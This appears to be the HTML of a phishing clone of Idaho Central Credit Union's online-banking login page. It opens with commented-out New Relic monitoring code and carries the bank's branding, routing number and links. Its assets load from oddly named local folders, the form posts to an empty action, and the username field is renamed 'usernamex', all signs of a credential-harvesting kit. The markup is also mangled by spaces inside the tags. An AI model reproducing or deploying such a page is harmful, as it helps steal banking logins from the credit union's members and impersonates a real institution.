            return "json" === n && null !== e ? e : "arraybuffer" === n || "blob" === n || "json" === n ? i(t.response) : "text" === n || "" === n || void 0 === n ? i(t.responseText) : void 0
        }
        var i = t(18);
        e.exports = r
    }, {}],
    16: [function(t, e, n) {
        function r() {}

        function i(t, e, n, r) {
            return function() {
                return u.recordSupportability("API/" + e + "/called"), o(t + e, [f.now()].concat(s(arguments)), n ? null : this, r), n ? void 0 : this
            }
        }
        var o = t("handle"),
            a = t(27),
            s = t(28),
            c = t("ee").get("tracer"),
            f = t("loader"),
            u = t(21),
            d = NREUM;
        "undefined" == typeof window.newrelic && (newrelic = d);
        var l = ["setPageViewName", "setCustomAttribute", "setErrorHandler", "finished", "addToTrace", "inlineHit", "addRelease"],
            p = "api-",
            h = p + "ixn-";
        a(l, function(t, e) {
            d[e] = i(p, e, !0, "api")
        }), d.addPageAction = i(p, "addPageAction", !0), d.setCurrentRouteName = i(p, "routeName", !0), e.exports = newrelic, d.interaction = function() {
            return (new r).get()
        };
        var m = r.prototype = {
            createTracer: function(t, e) {
                var n = {},
                    r = this,
                    i = "function" == typeof e;
                return o(h + "tracer", [f.now(), t, n], r),
                    function() {
                        if (c.emit((i ? "" : "no-") + "fn-start", [f.now(), r, i], n), i) try {
                            return e.apply(this, arguments)
                        } catch (t) {
                            throw c.emit("fn-err", [arguments, this, t], n), t
                        } finally {
                            c.emit("fn-end", [f.now()], n)
                        }
                    }
            }
        };
        a("actionText,setName,setAttribute,save,ignore,onEnd,getContext,end,get".split(","), function(t, e) {
            m[e] = i(h, e)
        }), newrelic.noticeError = function(t, e) {
            "string" == typeof t && (t = new Error(t)), u.recordSupportability("API/noticeError/called"), o("err", [t, f.now(), !1, e])
        }
    }, {}],
    17: [function(t, e, n) {
        function r(t) {
            if (NREUM.init) {
                for (var e = NREUM.init, n = t.split("."), r = 0; r < n.length - 1; r++)
                    if (e = e[n[r]], "object" != typeof e) return;
                return e = e[n[n.length - 1]]
            }
        }
        e.exports = {
            getConfiguration: r
        }
    }, {}],
    18: [function(t, e, n) {
        e.exports = function(t) {
            if ("string" == typeof t && t.length) return t.length;
            if ("object" == typeof t) {
                if ("undefined" != typeof ArrayBuffer && t instanceof ArrayBuffer && t.byteLength) return t.byteLength;
                if ("undefined" != typeof Blob && t instanceof Blob && t.size) return t.size;
                if (!("undefined" != typeof FormData && t instanceof FormData)) try {
                    return JSON.stringify(t).length
                } catch (e) {
                    return
                }
            }
        }
    }, {}],
    19: [function(t, e, n) {
        var r = !1;
        try {
            var i = Object.defineProperty({}, "passive", {get: function() {
                    r = !0
                }
            });
            window.addEventListener("testPassive", null, i), window.removeEventListener("testPassive", null, i)
        } catch (o) {}
        e.exports = function(t) {
            return r ? {
                passive: !0,
                capture: !!t
            } : !!t
        }
    }, {}],
    20: [function(t, e, n) {
        var r = 0,
            i = navigator.userAgent.match(/Firefox[\/\s](\d+\.\d+)/);
        i && (r = +i[1]), e.exports = r
    }, {}],
    21: [function(t, e, n) {
        function r(t, e) {
            var n = [a, t, {
                name: t
            }, e];
            return o("storeMetric", n, null, "api"), n
        }

        function i(t, e) {
            var n = [s, t, {
                name: t
            }, e];
            return o("storeEventMetrics", n, null, "api"), n
        }
        var o = t("handle"),
            a = "sm",
            s = "cm";
        e.exports = {
            constants: {
                SUPPORTABILITY_METRIC: a,
                CUSTOM_METRIC: s
            },
            recordSupportability: r,
            recordCustom: i
        }
    }, {}],
    22: [function(t, e, n) {
        function r() {
            return s.exists && performance.now ? Math.round(performance.now()) : (o = Math.max((new Date).getTime(), o)) - a
        }

        function i() {
            return o
        }
        var o = (new Date).getTime(),
            a = o,
            s = t(29);
        e.exports = r, e.exports.offset = a, e.exports.getLastTimestamp = i
    }, {}],
    23: [function(t, e, n) {
        function r(t, e) {
            var n = t.getEntries();
            n.forEach(function(t) {
                "first-paint" === t.name ? p("timing", ["fp", Math.floor(t.startTime)]) : "first-contentful-paint" === t.name && p("timing", ["fcp", Math.floor(t.startTime)])
            })
        }

        function i(t, e) {
            var n = t.getEntries();
            if (n.length > 0) {
                var r = n[n.length - 1];
                if (f && f < r.startTime) return;
                var i = [r],
                    o = a({});
                o && i.push(o), p("lcp", i)
            }
        }

        function o(t) {
            t.getEntries().forEach(function(t) {
                t.hadRecentInput || p("cls", [t])
            })
        }

        function a(t) {
            var e = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
            if (e) return e.type && (t["net-type"] = e.type), e.effectiveType && (t["net-etype"] = e.effectiveType), e.rtt && (t["net-rtt"] = e.rtt), e.downlink && (t["net-dlink"] = e.downlink), t
        }

        function s(t) {
            if (t instanceof w && !y) {
                var e = Math.round(t.timeStamp),
                    n = {
                        type: t.type
                    };
                a(n), e <= h.now() ? n.fid = h.now() - e : e > h.offset && e <= Date.now() ? (e -= h.offset, n.fid = h.now() - e) : e = h.now(), y = !0, p("timing", ["fi", e, n])
            }
        }

        function c(t) {
            "hidden" === t && (f = h.now(), p("pageHide", [f]))
        }
        if (!("init" in NREUM && "page_view_timing" in NREUM.init && "enabled" in NREUM.init.page_view_timing && NREUM.init.page_view_timing.enabled === !1)) {
            var f, u, d, l, p = t("handle"),
                h = t("loader"),
                m = t(26),
                v = t(19),
                w = NREUM.o.EV;
            if ("PerformanceObserver" in window && "function" == typeof window.PerformanceObserver) {
                u = new PerformanceObserver(r);
                try {
                    u.observe({
                        entryTypes: ["paint"]
                    })
                } catch (g) {}
                d = new PerformanceObserver(i);
                try {
                    d.observe({
                        entryTypes: ["largest-contentful-paint"]
                    })
                } catch (g) {}
                l = new PerformanceObserver(o);
                try {
                    l.observe({
                        type: "layout-shift",
                        buffered: !0
                    })
                } catch (g) {}
            }
            if ("addEventListener" in document) {
                var y = !1,
                    x = ["click", "keydown", "mousedown", "pointerdown", "touchstart"];
                x.forEach(function(t) {
                    document.addEventListener(t, s, v(!1))
                })
            }
            m(c)
        }
    }, {}],
    24: [function(t, e, n) {
        function r() {
            function t() {
                return e ? 15 & e[n++] : 16 * Math.random() | 0
            }
            var e = null,
                n = 0,
                r = window.crypto || window.msCrypto;
            r && r.getRandomValues && (e = r.getRandomValues(new Uint8Array(31)));
            for (var i, o = "xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx", a = "", s = 0; s < o.length; s++) i = o[s], "x" === i ? a += t().toString(16) : "y" === i ? (i = 3 & t() | 8, a += i.toString(16)) : a += i;
            return a
        }

        function i() {
            return a(16)
        }

        function o() {
            return a(32)
        }

        function a(t) {
            function e() {
                return n ? 15 & n[r++] : 16 * Math.random() | 0
            }
            var n = null,
                r = 0,
                i = window.crypto || window.msCrypto;
            i && i.getRandomValues && Uint8Array && (n = i.getRandomValues(new Uint8Array(t)));
            for (var o = [], a = 0; a < t; a++) o.push(e().toString(16));
            return o.join("")
        }
        e.exports = {
            generateUuid: r,
            generateSpanId: i,
            generateTraceId: o
        }
    }, {}],
    25: [function(t, e, n) {
        function r(t, e) {
            if (!i) return !1;
            if (t !== i) return !1;
            if (!e) return !0;
            if (!o) return !1;
            for (var n = o.split("."), r = e.split("."), a = 0; a < r.length; a++)
                if (r[a] !== n[a]) return !1;
            return !0
        }
        var i = null,
            o = null,
            a = /Version\/(\S+)\s+Safari/;
        if (navigator.userAgent) {
            var s = navigator.userAgent,
                c = s.match(a);
            c && s.indexOf("Chrome") === -1 && s.indexOf("Chromium") === -1 && (i = "Safari", o = c[1])
        }
        e.exports = {
            agent: i,
            version: o,
            match: r
        }
    }, {}],
    26: [function(t, e, n) {
        function r(t) {
            function e() {
                t(s && document[s] ? document[s] : document[o] ? "hidden" : "visible")
            }
            "addEventListener" in document && a && document.addEventListener(a, e, i(!1))
        }
        var i = t(19);
        e.exports = r;
        var o, a, s;
        "undefined" != typeof document.hidden ? (o = "hidden", a = "visibilitychange", s = "visibilityState") : "undefined" != typeof document.msHidden ? (o = "msHidden", a = "msvisibilitychange") : "undefined" != typeof document.webkitHidden && (o = "webkitHidden", a = "webkitvisibilitychange", s = "webkitVisibilityState")
    }, {}],
    27: [function(t, e, n) {
        function r(t, e) {
            var n = [],
                r = "",
                o = 0;
            for (r in t) i.call(t, r) && (n[o] = e(r, t[r]), o += 1);
            return n
        }
        var i = Object.prototype.hasOwnProperty;
        e.exports = r
    }, {}],
    28: [function(t, e, n) {
        function r(t, e, n) {
            e || (e = 0), "undefined" == typeof n && (n = t ? t.length : 0);
            for (var r = -1, i = n - e || 0, o = Array(i < 0 ? 0 : i); ++r < i;) o[r] = t[e + r];
            return o
        }
        e.exports = r
    }, {}],
    29: [function(t, e, n) {
        e.exports = {
            exists: "undefined" != typeof window.performance && window.performance.timing && "undefined" != typeof window.performance.timing.navigationStart
        }
    }, {}],
    ee: [function(t, e, n) {
        function r() {}

        function i(t) {
            function e(t) {
                return t && t instanceof r ? t : t ? f(t, c, a) : a()
            }

            function n(n, r, i, o, a) {
                if (a !== !1 && (a = !0), !p.aborted || o) {
                    t && a && t(n, r, i);
                    for (var s = e(i), c = m(n), f = c.length, u = 0; u < f; u++) c[u].apply(s, r);
                    var l = d[y[n]];
                    return l && l.push([x, n, r, s]), s
                }
            }

            function o(t, e) {
                g[t] = m(t).concat(e)
            }

            function h(t, e) {
                var n = g[t];
                if (n)
                    for (var r = 0; r < n.length; r++) n[r] === e && n.splice(r, 1)
            }

            function m(t) {
                return g[t] || []
            }

            function v(t) {
                return l[t] = l[t] || i(n)
            }

            function w(t, e) {
                p.aborted || u(t, function(t, n) {
                    e = e || "feature", y[n] = e, e in d || (d[e] = [])
                })
            }
            var g = {},
                y = {},
                x = {
                    on: o,
                    addEventListener: o,
                    removeEventListener: h,
                    emit: n,
                    get: v,
                    listeners: m,
                    context: e,
                    buffer: w,
                    abort: s,
                    aborted: !1
                };
            return x
        }

        function o(t) {
            return f(t, c, a)
        }

        function a() {
            return new r
        }

        function s() {
            (d.api || d.feature) && (p.aborted = !0, d = p.backlog = {})
        }
        var c = "nr@context",
            f = t("gos"),
            u = t(27),
            d = {},
            l = {},
            p = e.exports = i();
        e.exports.getOrSetContext = o, p.backlog = d
    }, {}],
    gos: [function(t, e, n) {
        function r(t, e, n) {
            if (i.call(t, e)) return t[e];
            var r = n();
            if (Object.defineProperty && Object.keys) try {
                return Object.defineProperty(t, e, {
                    value: r,
                    writable: !0,
                    enumerable: !1
                }), r
            } catch (o) {}
            return t[e] = r, r
        }
        var i = Object.prototype.hasOwnProperty;
        e.exports = r
    }, {}],
    handle: [function(t, e, n) {
        function r(t, e, n, r) {
            i.buffer([t], r), i.emit(t, e, n)
        }
        var i = t("ee").get("handle");
        e.exports = r, r.ee = i
    }, {}],
    id: [function(t, e, n) {
        function r(t) {
            var e = typeof t;
            return !t || "object" !== e && "function" !== e ? -1 : t === window ? 0 : a(t, o, function() {
                return i++
            })
        }
        var i = 1,
            o = "nr@id",
            a = t("gos");
        e.exports = r
    }, {}],
    loader: [function(t, e, n) {
        function r() {
            if (!O++) {
                var t = S.info = NREUM.info,
                    e = m.getElementsByTagName("script")[0];
                if (setTimeout(f.abort, 3e4), !(t && t.licenseKey && t.applicationID && e)) return f.abort();
                c(E, function(e, n) {
                    t[e] || (t[e] = n)
                });
                var n = a();
                s("mark", ["onload", n + S.offset], null, "api"), s("timing", ["load", n]);
                var r = m.createElement("script");
                0 === t.agent.indexOf("http://") || 0 === t.agent.indexOf("https://") ? r.src = t.agent : r.src = p + "://" + t.agent, e.parentNode.insertBefore(r, e)
            }
        }

        function i() {
            "complete" === m.readyState && o()
        }

        function o() {
            s("mark", ["domContent", a() + S.offset], null, "api")
        }
        var a = t(22),
            s = t("handle"),
            c = t(27),
            f = t("ee"),
            u = t(25),
            d = t(17),
            l = t(19),
            p = d.getConfiguration("ssl") === !1 ? "http" : "https",
            h = window,
            m = h.document,
            v = "addEventListener",
            w = "attachEvent",
            g = h.XMLHttpRequest,
            y = g && g.prototype,
            x = !1;
        NREUM.o = {
            ST: setTimeout,
            SI: h.setImmediate,
            CT: clearTimeout,
            XHR: g,
            REQ: h.Request,
            EV: h.Event,
            PR: h.Promise,
            MO: h.MutationObserver
        };
        var b = "" + location,
            E = {
                beacon: "bam.nr-data.net",
                errorBeacon: "bam.nr-data.net",
                agent: "js-agent.newrelic.com/nr-1216.min.js"
            },
            R = g && y && y[v] && !/CriOS/.test(navigator.userAgent),
            S = e.exports = {
                offset: a.getLastTimestamp(),
                now: a,
                origin: b,
                features: {},
                xhrWrappable: R,
                userAgent: u,
                disabled: x
            };
        if (!x) {
            t(16), t(23), m[v] ? (m[v]("DOMContentLoaded", o, l(!1)), h[v]("load", r, l(!1))) : (m[w]("onreadystatechange", i), h[w]("onload", r)), s("mark", ["firstbyte", a.getLastTimestamp()], null, "api");
            var O = 0
        }
    }, {}],
    "wrap-function": [function(t, e, n) {
        function r(t, e) {
            function n(e, n, r, c, f) {
                function nrWrapper() {
                    var o, a, u, l;
                    try {
                        a = this, o = d(arguments), u = "function" == typeof r ? r(o, a) : r || {}
                    } catch (p) {
                        i([p, "", [o, a, c], u], t)
                    }
                    s(n + "start", [o, a, c], u, f);
                    try {
                        return l = e.apply(a, o)
                    } catch (h) {
                        throw s(n + "err", [o, a, h], u, f), h
                    } finally {
                        s(n + "end", [o, a, l], u, f)
                    }
                }
                return a(e) ? e : (n || (n = ""), nrWrapper[l] = e, o(e, nrWrapper, t), nrWrapper)
            }

            function r(t, e, r, i, o) {
                r || (r = "");
                var s, c, f, u = "-" === r.charAt(0);
                for (f = 0; f < e.length; f++) c = e[f], s = t[c], a(s) || (t[c] = n(s, u ? c + r : r, i, c, o))
            }

            function s(n, r, o, a) {
                if (!h || e) {
                    var s = h;
                    h = !0;
                    try {
                        t.emit(n, r, o, e, a)
                    } catch (c) {
                        i([c, n, r, o], t)
                    }
                    h = s
                }
            }
            return t || (t = u), n.inPlace = r, n.flag = l, n
        }

        function i(t, e) {
            e || (e = u);
            try {
                e.emit("internal-error", t)
            } catch (n) {}
        }

        function o(t, e, n) {
            if (Object.defineProperty && Object.keys) try {
                var r = Object.keys(t);
                return r.forEach(function(n) {
                    Object.defineProperty(e, n, {get: function() {
                            return t[n]
                        },
                        set: function(e) {
                            return t[n] = e, e
                        }
                    })
                }), e
            } catch (o) {
                i([o], n)
            }
            for (var a in t) p.call(t, a) && (e[a] = t[a]);
            return e
        }

        function a(t) {
            return !(t && t instanceof Function && t.apply && !t[l])
        }

        function s(t, e) {
            var n = e(t);
            return n[l] = t, o(t, n, u), n
        }

        function c(t, e, n) {
            var r = t[e];
            t[e] = s(r, n)
        }

        function f() {
            for (var t = arguments.length, e = new Array(t), n = 0; n < t; ++n) e[n] = arguments[n];
            return e
        }
        var u = t("ee"),
            d = t(28),
            l = "nr@original",
            p = Object.prototype.hasOwnProperty,
            h = !1;
        e.exports = r, e.exports.wrapFunction = s, e.exports.wrapInPlace = c, e.exports.argsToArray = f
    }, {}]
}, {}, ["loader", 2, 13, 4, 3]); < /script>
-->
< meta name = "format-detection"
content = "telephone=no" >
    < link href = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/css.css"
rel = "Stylesheet"
type = "text/css" >
    < link href = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/jquery-ui.min.css"
rel = "stylesheet"
type = "text/css" >
    < link href = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/base.min.css"
rel = "stylesheet"
type = "text/css" >
    < link href = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/iris.shim.mobile.min.css"
rel = "stylesheet"
type = "text/css" >
    < link href = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/iris.android.min.css"
rel = "stylesheet"
type = "text/css" >
    < link href = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/iris-foundation.min.css"
rel = "stylesheet"
type = "text/css" >
    < link rel = "stylesheet"
href = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/theme.mobile.min.css" >
    < link rel = "stylesheet"
href = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/iris-components.shim.mobile.min.css"
type = "text/css" >
    < link rel = "stylesheet"
href = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/iris-foundation.min-1.css"
type = "text/css" >
    < link rel = "stylesheet"
href = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/iris-components.min.css"
type = "text/css" >
    < link rel = "stylesheet"
href = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/isotope.min.css"
type = "text/css" >
    < style id = "inert-style" >
    [inert] {
        pointer - events: none;
        cursor: default;
    }
    [inert], [inert] * {
        user - select: none; - webkit - user - select: none; - moz - user - select: none; - ms - user - select: none;
    } < /style> < script type = "text/javascript"
src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/1ca8ebd0.js" > < /script>

< link rel = "stylesheet"
href = "VideoChat/Face_to_Face/ServiceAgent/MobileDevice/style.css" / >

    < /head> < body class = "alk-body shared-layout isotope-mobile Authentication iris-mouse-use-detected windows challenge-type-username-and-password"
id = "username_page"
data - orion = "" >
    < div id = "mmenu_container" >
    < div id = "wrapper" >
    < div id = "content"
class = "clearfix" >
    < div class = "card-container flush-with-titlebar" >
    < div class = "card card-full-width" >
    < div class = "cms-content-area iris-content"
data - cms - content - area = "top-ribbon" > < /div> < /div> < /div> < div class = "cms-content-area"
data - cms - content - area = "header-card" > < /div>
    <!--
    < script >
    function toKebabCase(str) {
        return str && str.match(/[A-Z]{2,}(?=[A-Z][a-z]+[0-9]*|\b)|[A-Z]?[a-z]+[0-9]*|[A-Z]|[0-9]+/g)
            .join('-')
            .toLowerCase();
    }
document.body.classList.add('isotope-mobile', 'Authentication', 'challenge-type-empty');
document.body.id = 'username_page';
document.body.addEventListener('challengetypechange', function(event) {
    var currentChallengeType = toKebabCase('ChallengeType' + event.detail.currentChallengeType);
    var previousChallengeType = toKebabCase('ChallengeType' + event.detail.previousChallengeType);
    document.body.classList.add(currentChallengeType);
    document.body.classList.remove(previousChallengeType);
}); < /script>
-->
< div class = "mobile-authentication-container" >
    < div id = "login_header"
class = "mobile-authentication-header" >
    < div class = "brand-logo"
role = "img"
aria - label = "" > < /div> < /div> < div class = "mobile-authentication-content" >
    < div id = "app"
role = "main"
class = "isotope-app" >
    < div class = "isotope-page--authentication isotope-page" >
    < div class = "isotope-challenge-type--username-and-password isotope-challenge-type" >
    < div >
    < div id = "irisv_sheet_m1n87i7iu4b"
role = "dialog"
aria - label = "Information"
aria - hidden = "true"
class = "irisv-sheet irisv-sheet--side irisv-sheet--partial irisv-sheet--suppressed isotope-hidden--desktop info-sheet hidden" >
    < div class = "irisv-sheet__scrim" > < /div> < div tabindex = "0"
class = "irisv-sheet__container" >
    <!---->
    < div tabindex = "-1"
class = "irisv-sheet__header irisv-sheet__header--shadow" >
    <!----><!---->
    < h3 id = "irisv_sheet_m1n87i7iu4b_title"
class = "irisv-sheet__header-text font-content-heading--high-emphasis irisv-sheet__header-text--visible" > Information < /h3>
    <!---->
    < div style = "display: inline-block;"
class = "irisv-sheet__header-close-button" >
    < button tabindex = "0"
role = "button"
aria - label = "close"
class = "irisv-quickactionbutton irisv-quickactionbutton--mediumEmphasis irisv-quickactionbutton--embedded" >
    < div >
    < div class = "irisv-avatar" >
    < svg viewBox = "0 0 104 104"
class = "irisv-avatar__svg"
style = "width: 24px; height: 24px; display: none;" >
    < path d = "M52.05, 2.17a50, 50, 0, 1, 1-50, 50, 50, 50, 0, 0, 1, 50-50"
class = "irisv-avatar__progress-ring--static" > < /path> < path d = "M52.05, 2.17a50, 50, 0, 1, 1-50, 50, 50, 50, 0, 0, 1, 50-50"
class = "irisv-avatar__progress-ring--fill"
style = "stroke: rgb(8, 136, 86); stroke-dasharray: 0px; stroke-dashoffset: 0px;" > < /path> < /svg> < div class = "irisv-avatar__status-line"
style = "width: 24px; height: 24px;" >
    < div role = "img"
class = "irisv-avatar__content"
style = "width: 24px; height: 24px; border-radius: 24px; background: rgb(var(--colorBrandedAffordance100));" >
    < span role = "img"
class = "irisv-icon irisv-avatar__content__main-icon font-icon-cancel-x irisv-icon--md irisv-avatar__content__main-icon--xsmall"
style = "color: rgb(var(--colorBrandedAffordanceAccessible)); width: 24px; height: 24px; font-size: 8px;" >
    <!---->
    < /span>
    <!---->
    < /div>
    <!----><!---->
    < /div>
    <!---->
    < /div>
    <!---->
    < /div> < /button> < /div> < /div> < div class = "irisv-sheet__content" >
    < div class = "top-buffer" > < /div>
    <!---->
    < div class = "irisv-sheet__inner-content" >
    < div id = "mobile-info-panel" >
    < div class = "fineprint" >
    < p > Your savings federally insured to at least $250, 000 and backed by the full faith and credit of the United States Government. < /p> < p > National Credit Union Administration, a U.S.Government Agency < /p> < p > Copyright© 2022 Idaho Central Credit Union.All rights reserved. < /p> < p > < strong > Routing Number: < /strong> 324 173 626</p >
    < /div> < ul role = "navigation"
class = "legal-links clearfix" >
    < li > < a href = "https://www.iccu.com/online-privacy-policy"
target = "_blank" > Privacy Policy < /a></li >
    < /ul> < /div> < /div> < div class = "bottom-buffer" > < /div> < /div>
    <!---->
    < div class = "irisv-sheet__footer irisv-sheet__footer--shadow"
style = "display: none;" > < /div> < div tabindex = "0" > < /div> < /div> < /div> < /div> < div id = "usernameAndPassword_ellipsis"
class = "ellipsis" >
    < div class = "irisv-menu-dropdown irisv-menu-dropdown--navigation irisv-menu-dropdown--quickactionbutton"
id = "ellipsis_menu" >
    < div id = "irisv_menu_dropdown_8w4bx5dff9j"
aria - haspopup = ""
class = "irisv-menu-dropdown__menu-button" >
    <!----><!---->
    < div style = "display: inline-block;"
aria - haspopup = "true"
is - static = "true"
size = "medium" >
    < button tabindex = "0"
role = "button"
aria - label = "Menu"
class = "irisv-quickactionbutton irisv-quickactionbutton--mediumEmphasis irisv-quickactionbutton--embedded" >
    < div >
    < div class = "irisv-avatar" >
    < svg viewBox = "0 0 104 104"
class = "irisv-avatar__svg"
style = "width: 40px; height: 40px; display: none;" >
    < path d = "M52.05, 2.17a50, 50, 0, 1, 1-50, 50, 50, 50, 0, 0, 1, 50-50"
class = "irisv-avatar__progress-ring--static" > < /path> < path d = "M52.05, 2.17a50, 50, 0, 1, 1-50, 50, 50, 50, 0, 0, 1, 50-50"
class = "irisv-avatar__progress-ring--fill"
style = "stroke: rgb(8, 136, 86); stroke-dasharray: 0px; stroke-dashoffset: 0px;" > < /path> < /svg> < div class = "irisv-avatar__status-line"
style = "width: 40px; height: 40px;" >
    < div role = "img"
class = "irisv-avatar__content"
style = "width: 40px; height: 40px; border-radius: 24px; background: rgb(var(--colorBrandedAffordance100));" >
    < span role = "img"
class = "irisv-icon irisv-avatar__content__main-icon font-icon-more irisv-icon--md irisv-avatar__content__main-icon--medium"
style = "color: rgb(var(--colorBrandedAffordanceAccessible)); width: 40px; height: 40px; font-size: 14px;" >
    <!---->
    < /span>
    <!---->
    < /div>
    <!----><!---->
    < /div>
    <!---->
    < /div>
    <!---->
    < /div> < /button> < /div> < /div> < div class = "irisv-menu-dropdown__menu-wrapper irisv-menu-dropdown__menu-wrapper--flow-down"
style = "display: none;" >
    < div class = "irisv-menu-dropdown__menu irisv-menu-dropdown__menu--navigation"
style = "max-width: none;" >
    < ul aria - label = "Menu"
role = "menu"
tabindex = "-1"
class = "irisv-menu-dropdown__menu-container" >
    < li role = "none" >
    < a role = "menuitem"
tabindex = "-1"
data - value = "0"
class = "irisv-menu-dropdown__menu-item" >
    < span role = "img"
class = "irisv-icon irisv-menu-dropdown__menu-icon font-icon-live-chat irisv-icon--md"
aria - hidden = "true" >
    <!---->
    < /span> < div class = "irisv-menu-dropdown__menu-text font-body-2" > Live Chat < /div>
    <!---->
    < /a> < /li> < li role = "none" >
    < a role = "menuitem"
tabindex = "-1"
href = "https://www.iccu.com/rates/"
data - value = "1"
class = "irisv-menu-dropdown__menu-item" >
    < span role = "img"
class = "irisv-icon irisv-menu-dropdown__menu-icon font-icon-rates irisv-icon--md"
aria - hidden = "true" >
    <!---->
    < /span> < div class = "irisv-menu-dropdown__menu-text font-body-2" > Rates < /div>
    <!---->
    < /a> < /li> < li role = "none" >
    < a role = "menuitem"
tabindex = "-1"
href = "https://myebranch.iccu.com/Mobile/Locations/LocationSearch"
data - value = "2"
class = "irisv-menu-dropdown__menu-item" >
    < span role = "img"
class = "irisv-icon irisv-menu-dropdown__menu-icon font-icon-locations irisv-icon--md"
aria - hidden = "true" >
    <!---->
    < /span> < div class = "irisv-menu-dropdown__menu-text font-body-2" > Locations < /div>
    <!---->
    < /a> < /li> < li role = "none" >
    < a role = "menuitem"
tabindex = "-1"
href = "https://www.iccu.com/"
data - value = "3"
class = "irisv-menu-dropdown__menu-item" >
    < span role = "img"
class = "irisv-icon irisv-menu-dropdown__menu-icon font-icon-full-site irisv-icon--md"
aria - hidden = "true" >
    <!---->
    < /span> < div class = "irisv-menu-dropdown__menu-text font-body-2" > View Full Site < /div>
    <!---->
    < /a> < /li> < li role = "none" >
    < a role = "menuitem"
tabindex = "-1"
href = "https://myebranch.iccu.com/Mobile/Contact"
data - value = "4"
class = "irisv-menu-dropdown__menu-item" >
    < span role = "img"
class = "irisv-icon irisv-menu-dropdown__menu-icon font-icon-contact irisv-icon--md"
aria - hidden = "true" >
    <!---->
    < /span> < div class = "irisv-menu-dropdown__menu-text font-body-2" > Contact < /div>
    <!---->
    < /a> < /li> < li role = "none" >
    < a role = "menuitem"
tabindex = "-1"
href = "https://myebranch.iccu.com/Mobile/Support"
data - value = "5"
class = "irisv-menu-dropdown__menu-item" >
    < span role = "img"
class = "irisv-icon irisv-menu-dropdown__menu-icon font-icon-support irisv-icon--md"
aria - hidden = "true" >
    <!---->
    < /span> < div class = "irisv-menu-dropdown__menu-text font-body-2" > Support < /div>
    <!---->
    < /a> < /li> < li role = "none" >
    < a role = "menuitem"
tabindex = "-1"
href = "https://www.facebook.com/IdahoCentralCreditUnion"
data - value = "6"
class = "irisv-menu-dropdown__menu-item" >
    < span role = "img"
class = "irisv-icon irisv-menu-dropdown__menu-icon font-icon-facebook-small irisv-icon--md"
aria - hidden = "true" >
    <!---->
    < /span> < div class = "irisv-menu-dropdown__menu-text font-body-2" > Facebook < /div>
    <!---->
    < /a> < /li> < li role = "none" >
    < a role = "menuitem"
tabindex = "-1"
href = "https://twitter.com/Idaho_Central"
data - value = "7"
class = "irisv-menu-dropdown__menu-item" >
    < span role = "img"
class = "irisv-icon irisv-menu-dropdown__menu-icon font-icon-twitter-small irisv-icon--md"
aria - hidden = "true" >
    <!---->
    < /span> < div class = "irisv-menu-dropdown__menu-text font-body-2" > Twitter < /div>
    <!---->
    < /a> < /li> < li role = "none" >
    < a role = "menuitem"
tabindex = "-1"
href = "https://www.youtube.com/IdahoCentralCU"
data - value = "8"
class = "irisv-menu-dropdown__menu-item" >
    < span role = "img"
class = "irisv-icon irisv-menu-dropdown__menu-icon font-icon-youtube irisv-icon--md"
aria - hidden = "true" >
    <!---->
    < /span> < div class = "irisv-menu-dropdown__menu-text font-body-2" > YouTube < /div>
    <!---->
    < /a> < /li> < li role = "none" >
    < a role = "menuitem"
tabindex = "-1"
href = "https://www.linkedin.com/company/idahocentralcreditunion"
data - value = "9"
class = "irisv-menu-dropdown__menu-item" >
    < span role = "img"
class = "irisv-icon irisv-menu-dropdown__menu-icon font-icon-linkedin irisv-icon--md"
aria - hidden = "true" >
    <!---->
    < /span> < div class = "irisv-menu-dropdown__menu-text font-body-2" > LinkedIn < /div>
    <!---->
    < /a> < /li> < li role = "none" >
    < a role = "menuitem"
tabindex = "-1"
href = "https://instagram.com/idahocentralcu/"
data - value = "10"
class = "irisv-menu-dropdown__menu-item" >
    < span role = "img"
class = "irisv-icon irisv-menu-dropdown__menu-icon font-icon-instagram irisv-icon--md"
aria - hidden = "true" >
    <!---->
    < /span> < div class = "irisv-menu-dropdown__menu-text font-body-2" > Instagram < /div>
    <!---->
    < /a> < /li> < li role = "none" >
    < a role = "menuitem"
tabindex = "-1"
target = "__self"
data - value = "11"
class = "irisv-menu-dropdown__menu-item" >
    < span role = "img"
class = "irisv-icon irisv-menu-dropdown__menu-icon font-icon-info irisv-icon--md"
aria - hidden = "true" >
    <!---->
    < /span> < div class = "irisv-menu-dropdown__menu-text font-body-2" > Info < /div>
    <!---->
    < /a> < /li> < /ul>
    <!---->
    < /div> < /div> < /div> < /div> < form id = "homeForm"
name = "homeForm"
action = ""
method = "POST"
class = "isotope-slide usernameAndPasswordForm" >
    <!---->
    < div class = "isotope-slide__content" >
    < div class = "isotope-hidden--desktop mar-top--small" > < /div> < div class = "isotope-hidden--mobile" >
    < h1 class = "font-content-heading--district mar-top--0 mar-bottom--big" >
    Welcome to online banking < /h1> < /div> < div style = "font-weight:bold;font-size:19px;text-align:center;margin:1em 0" > Welcome to online banking < /div> < div class = "irisv-textfield mar-bottom-small irisv-textfield--filled" >
    < div class = "irisv-textfield__container" >
    < div class = "irisv-textfield__control irisv-textfield__control-spacing-icon" >
    < div class = "irisv-textfield__leading-icon" >
    < span role = "img"
class = "irisv-icon font-icon-profile irisv-icon--md"
aria - hidden = "true" >
    <!---->
    < /span> < /div> < div class = "irisv-textfield__input-wrapper" >
    < span id = "username_label" >
    < label
for = "username"
class = "irisv-textfield__label font-caption" > Username < /label> < /span> < input type = "text"
id = "usernamex"
name = "usernamex"
autocomplete = "off"
required class = "font-body-1 irisv-textfield__input"
value = "" >
    < /div>
    <!----><!---->
    < /div> < div class = "irisv-textfield__messages" >
    <!---->
    < div role = "alert" >
    <!---->
    < /div>
    <!----><!---->
    < /div> < /div> < /div> < div class = "irisv-textfield irisv-textfield__password mar-top--small irisv-textfield--filled"
kind = "underline" >
    < div class = "irisv-textfield__container" >
